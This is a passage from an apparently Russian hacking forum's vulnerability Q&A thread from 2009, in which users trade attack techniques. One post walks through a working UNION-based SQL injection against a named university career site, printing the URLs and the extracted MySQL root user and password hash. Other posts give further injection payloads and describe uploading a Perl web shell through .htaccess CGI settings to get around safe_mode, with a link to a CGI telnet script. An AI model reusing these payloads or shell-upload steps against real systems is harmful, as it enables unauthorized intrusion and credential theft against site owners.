Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    #7061 farex, 14 May 2009
    Last edited: 14 May 2009
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    адаймнехешсволочь!
    Вот такая команда везде работает
     
    1 person likes this.
  3. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    wildshaman, мб мы не будем флудить??

    Возьмём за пример твою же скулю, тоторую ты выклодовал:
    Code:
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    Мы видим что принтабельный столбец - 2
    Проверим версию БД выполнив команду version()

    Code:
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+from+mysql.user/*
    получаем:
    Code:
    4.0.23a-log
    Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA
    Но изучив бд mysql мы уже знаем, что там присутствуют колонки user и password
    Имея эти даные мы составляем следующие запрос к базе данных:
    Code:
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mysql.user/*
    Code:
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from+mysql.user/*
    Но ведь не удобно состовлять несколько запросов, не так ди?

    Для этого можно использовать функцию concat() или concat_ws()
    Пример:

    Code:
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11+from+mysql.user/*
    И получить всё и сразу:

    Code:
    root:0e420e231935eccd
    0x3a - это двоеточие в хексе!


    ##################################

    Для начала посоветую тебе почитать литературу по php и sql.
    После чего можешь приступать к чтению статтей по sql inj
     
    #7063 bug1z, 14 May 2009
    Last edited: 14 May 2009
    3 people like this.
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    очень замечательная для обучения скуль :)
    magic_quotes_gpc=off
    file_priv=Y
    FreeBSD (!) в общем классно.
     
    1 person likes this.
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    bug1z, только как мы видим что принтабельный столбец №2 ?
     
  6. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    2jecka3000
    при запросе
    Code:
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
    вывелась двойка и тройка!
    можешь сипользовать любой!
     
  7. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    на сервере safe_mode=on и disable_functions=passthru, shell_exec, proc_open. Могу инклудить php-код и читать папки и файлы только в папке htdocs и во вложенных, система FreeBSD 6.4-RELEASE-p3. Как при таком раскладе можно выполнять комманды на сервере? Подскажите люди добрые!
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    заливай перловый шелл
     
    2 people like this.
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    заливаешь в папку .htaccess
    пишешь в него
    Options ExecCGI
    AddType application/x-httpd-cgi .pl

    заливаешь в эту папку shell.pl
    ставишь на него chmod 755
    и вуаля. Хороший перловый шелл - r57pws - гугл в помощь
     
    1 person likes this.
  10. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Это у тя на страничке отображается......
    ---------------------------------------
    Актуальные мероприятия партнеров
    2
     
    #7070 farex, 15 May 2009
    Last edited: 15 May 2009
  11. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Вопросик есть
    http://www.site.ru/index.php?Id=-1+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12+FROM+USERS+LIMIT+0,1+%23+

    все цифры выводит на ура, но если например вместо 1 ил 3 написать user() или еще чет то еррор

    как исправить?
     
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    -1+UNION+SELECT+0,unhex(hex(version())),2,3,4,5,6,7,8,9,10,11,12+FROM+U SERS+LIMIT+0,1+%23+
     
    #7072 R1dex, 15 May 2009
    Last edited: 15 May 2009
    1 person likes this.
  13. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    неа, не работает вот еще что нашел
    Id=-1+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,12+FROM+USERS+LIMIT+1,1+%23+

    выводит Юзера

    Id=-1000+UNION+SELECT+0,user(),2,3,4,5,6,7,8,9,10,11,12+FROM+USERS+LIMIT+1,1+%23+
    Не выводит Юзера

    но сам прикол что выводит только юзера, пишешь версию и еррор
     
  14. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    позоду стоит проверка на кол символом, вводишь 0x2b норм вводишь чет длиннее и ниче, как можно обойти?
     
  15. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Кидай в пм ссылку, посмотрим.
     
    1 person likes this.
  16. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Залил 2 перловых файла одинакового содержания:
    PHP:
    #!/usr/bin/perl
    print "Content-Type:text/html\n\n";
    print 
    "HELLO WORLD!\n";
    назвал их perl.pl и perl.cgi
    права у обоих 755
    содержимое .htaccess было таким:
    PHP:
    Options +ExecCGI
    AddHandler cgi
    -script .cgi .pl
    и таким:
    PHP:
    Options ExecCGI
    AddHandler cgi
    -script .cgi .pl
    и таким:
    PHP:
    Options +ExecCGI
    AddHandler cgi
    -script .cgi .pl
    ScriptInterpreterSource registry
    и таким:
    PHP:
    Options +ExecCGI
    AddType application
    /x-httpd-cgi .pl .cgi
    и таким:
    PHP:
    Options +ExecCGI
    AddType application
    /x-httpd-cgi .pl .cgi
    ScriptInterpreterSource registry
    и таким:
    PHP:
    Options +ExecCGI
    AddHandler cgi
    -script .cgi .pl
    AddType application
    /x-httpd-cgi .pl .cgi
    права на .htaccess 744
    Владелец скриптов: 80/4962 (uid/gid)
    У папки, в которой лежат скрипты права 777, владелец - 4962/4962
    Запись в папку cgi-bin запрещена (права 755)
    И всё время - ошибка 500 Internal Server Error!!! Что делать я не знаю, подскажите пожалуйста!
    А да забыл написать, символы \r из концов строк я удалил.
     
  17. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    сейф возможно обойти? Каким образом?...помогите =))
     
    #7077 +++AndreyDevil+++, 15 May 2009
    Last edited by a moderator: 16 May 2009
    1 person likes this.
  18. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Залей шелл который работает при включеном Safe-mode
    Или же пробуй это:
    http://www.rohitab.com/cgiscripts/cgitelnet.txt
    переменуй в *.cgi и помести в папку cgi-bin с правами 755 и с помощю скрипта переходи дальше..
     
    #7078 bug1z, 15 May 2009
    Last edited: 15 May 2009
  19. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    А посоветовать что нить конкретное можешь?
    Добраться бы до неё...
     
    #7079 +++AndreyDevil+++, 15 May 2009
    Last edited: 15 May 2009
  20. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    ровно на 1 пост выше своего читай :)
     
    2 people like this.
Thread Status:
Not open for further replies.